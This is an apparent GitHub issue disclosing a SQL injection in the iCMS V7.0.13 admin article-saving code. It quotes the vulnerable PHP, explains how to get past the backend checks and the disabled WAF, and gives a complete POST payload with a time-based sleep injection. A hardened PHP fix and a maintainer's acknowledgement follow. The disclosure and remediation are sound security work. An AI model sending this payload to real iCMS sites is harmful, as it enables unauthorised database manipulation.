
iCMS V7.0.13 Has A SQLi vulnerability in article.admincp.php #47

awindog opened this issue Jan 10, 2019 · 1 comment



commented Jan 10, 2019

The vulnerability is in the backend.
At line 898, in this code, we can control $_data_id:

        $_data_id = stripslashes($_POST['_data_id']);  // raw POST value, backslashes removed
        $_data_id = json_decode($_data_id, true);      // decoded into an array
        $_count   = count($_data_id);

We can post data and, because of stripslashes(), we can also post a ' successfully.
At line 930:

            $dkey = array_search($adid, $_data_id);
            if($dkey!==false && $_chapter){ // when revoking chapters
                if($_data_id)foreach ($_data_id as $_id) {
                    $_id && article::del_data($_id,'id');  // each $_id reaches the DELETE query unvalidated
                }
            }

If $_data_id is an array, $dkey!==false and $_chapter has a value, we can send $_id to article::del_data($_id,'id').

In article.class.php:

    public static function del_data($id,$f='aid'){
        iDB::query("DELETE FROM `#iCMS@__article_data` WHERE `$f`='$id'");  // $f and $id interpolated directly into SQL
    }

The public function article_data() is used in the public function do_save() at line 751: `$url OR $this->article_data($body,$aid,$haspic,$_chapter);`
We can see `$dkey = array_search($adid, $_data_id);`. We don't know $adid, but we can post many values to bypass this, like "1":"1","2":"2"......"1000":"1000".
And for $_chapter, `$_chapter = (int)$_POST['chapter'];`, so we can send chapter=1 to bypass it.
So the final payload is:

    _cid=&_scid=&_tags=&_pid=&_data_id=&article_id=0&userid=1&ucid=&postype=1&REFERER=http%3A%2F%2Flocalhost%2FiCMSv7013%2Fadmincp.php%3Fapp%3Darticle%26do%3Dtrash&chapter=1&markdown=0&cid=1&status=1&scid%5B%5D=1&pid%5B%5D=0&title=aaaaa&stitle=aa&source=&author=&editor=iCMS&pic=&mpic=&spic=&keywords=&tags=a&description=a&data_id=&subtitle=&autopic=1&body%5B%5D=%3Cp%3Eaaaaaaaaaaaaa%3Cbr%2F%3E%3C%2Fp%3E&pubdate=2019-01-05+14%3A04%3A14&sortnum=1546668254&weight=1546668254&hits=0&hits_today=0&hits_yday=0&hits_week=0&hits_month=0&favorite=0&comments=0&good=0&bad=0&tpl=&clink=&url=&_data_id={"1":"1","2":"2"......"1000":"1000","1001":"1' and sleep (3)%23"}

And another very very very very very important problem is that in admincp.php there is `define('iPHP_WAF_POST',false);`, but in IWAF.class.php you use `defined('iPHP_WAF_POST') OR define('iPHP_WAF_POST',true);`. At that point `defined('iPHP_WAF_POST')` of course returns true, which means this WAF in the backend is of no use at all!!!!!!!!!!!! So I can use sleep(3) and keep injecting.

author by
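One way to close the two weak spots the report points at (an unvalidated `_data_id` list and string interpolation in `del_data()`), written here as an added example; it is not iCMS's code and not the reporter's. It assumes a PDO connection in place of iCMS's `iDB` wrapper, and the function names `parse_data_ids` and `del_data_safe` are hypothetical; the table name is kept as in the report, with `#iCMS@__` being the prefix placeholder that iCMS substitutes elsewhere.

```php
<?php
// Added example (not iCMS code): hardened handling for the `_data_id` POST
// field and a parameterised replacement for article::del_data().
// Assumption: a PDO connection is available instead of iCMS's iDB class.
declare(strict_types=1);

/**
 * Parse the `_data_id` POST field into a list of positive integers.
 * Anything that is not a clean integer is discarded, so a value such as
 * "1' and sleep (3)#" never reaches the query layer.
 */
function parse_data_ids(string $raw): array
{
    $decoded = json_decode($raw, true);
    if (!is_array($decoded)) {
        return [];
    }
    $ids = [];
    foreach ($decoded as $v) {
        if (is_int($v) && $v > 0) {
            $ids[] = $v;
        } elseif (is_string($v) && $v !== '' && ctype_digit($v) && (int)$v > 0) {
            $ids[] = (int)$v;
        }
        // quotes, SQL fragments, floats, nested arrays and 0 are all dropped here
    }
    return array_values(array_unique($ids));
}

/**
 * Safe replacement for article::del_data(): the column name must come from a
 * fixed whitelist and the id is bound as a parameter, never interpolated.
 * Returns the number of deleted rows.
 */
function del_data_safe(PDO $pdo, int $id, string $f = 'aid'): int
{
    static $allowed = ['aid' => true, 'id' => true];
    if (!isset($allowed[$f])) {
        throw new InvalidArgumentException("unsupported column: $f");
    }
    // Table name taken from the report; `#iCMS@__` is iCMS's prefix placeholder
    // and is assumed to be expanded before the statement is prepared.
    $stmt = $pdo->prepare("DELETE FROM `#iCMS@__article_data` WHERE `$f` = :id");
    $stmt->execute([':id' => $id]);
    return $stmt->rowCount();
}

// Constructed payload in the same shape as the report's `_data_id` value.
$payload = '{"1":"1","2":"2","1001":"1\' and sleep (3)#"}';
print_r(parse_data_ids($payload));   // only the clean integer ids survive

// Usage in the chapter-revoke branch would then be:
//   foreach (parse_data_ids(stripslashes($_POST['_data_id'])) as $id) {
//       del_data_safe($pdo, $id, 'id');
//   }
```

With this shape the `$_chapter`/`array_search` conditions the report bypasses no longer matter for the injection: whatever reaches `del_data_safe()` is already an integer, and the column name cannot be steered by input either.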



commented Jan 10, 2019

Thank you, we will fix it as soon as possible
